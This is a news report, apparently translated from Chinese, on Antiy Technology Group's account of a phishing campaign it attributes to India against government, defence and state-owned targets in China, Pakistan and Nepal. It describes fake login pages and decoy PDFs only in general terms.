On November 1, the reporter learned from Antiy Technology Group that since March this year, the group has captured a number of phishing attacks targeting my country and South Asian subcontinent countries. Cyber attackers from India have attempted to attack my country’s national defense military and state-owned enterprises. The analysis report will be released to the public soon.
It is reported that the activity involved a large number of network nodes, and the main targets of the attack were the governments, national defense forces and state-owned enterprises of China, Pakistan, Nepal and other countries. “Attackers disguised themselves as government or military personnel of the target country, delivered attack emails with phishing attachments or embedded phishing links to each other’s mailboxes, and induced the target to visit the phishing websites built by the attackers in various ways through the links, collecting Account password entered by the victim for intelligence gathering or lateral attack.”
Antiy found that the earliest time of this batch of phishing attacks can be traced back to April 2019, and the attacking organization came from India. Attackers mainly use social engineering (eg spear phishing emails, phishing PDF documents masquerading as government military personnel) to carry out large-scale phishing attacks. The phishing attack methods it uses are cunning and changeable, and the phishing emails and phishing PDF documents produced are also very realistic. At the same time, the forms of phishing websites used are also various, and the phishing pages are basically the same as the counterfeit objects, which makes it hard to prevent.
According to the introduction, when an attacker uses a phishing email to launch an attack, the attacker pretends to be a government official of the target country, etc. to send an email with a link to a phishing website embedded in the body of the email. mail system. When the victim enters the account password, the phishing website will send the victim’s account password information back to the phishing background, and automatically download PDF files related to the target government and army as a cover.
When attackers use phishing websites to attack, they include automatic redirection and direct Display. Among them, the automatic jump type is that when the victim visits the phishing webpage through the phishing link, the phishing webpage will first display the static webpage in the name of “restricted”, “update email system”, etc. After waiting for the time set by the attacker, the phishing page will pop up pop-up windows such as “Your email login timed out, you have been logged out, please log in again”, “The domain where your account is located has expired” and other pop-ups. When the victim confirms the pop-up window, it will jump to the login page of the attacker’s fake email address.
The reporter learned that, as of now, Antiy has found that the organization has more than 100 phishing and counterfeiting websites, some of which are aimed at major universities, state-owned enterprises and government and other important units in China, and most of them are aimed at South Asian regions such as Pakistan and Nepal. The military, government, defense, diplomacy and other fields of other countries.
Once the phishing attack is effective, the compromised mailbox address will become the starting point of a new wave of social engineering attacks, and the endpoints implanted with Trojan horses will become the “bridgehead” for further attacks, which will affect national security, social security, government and enterprise security and citizens. Personal safety is a huge hazard.
The Links: CM600DX-24T VI-25M-EU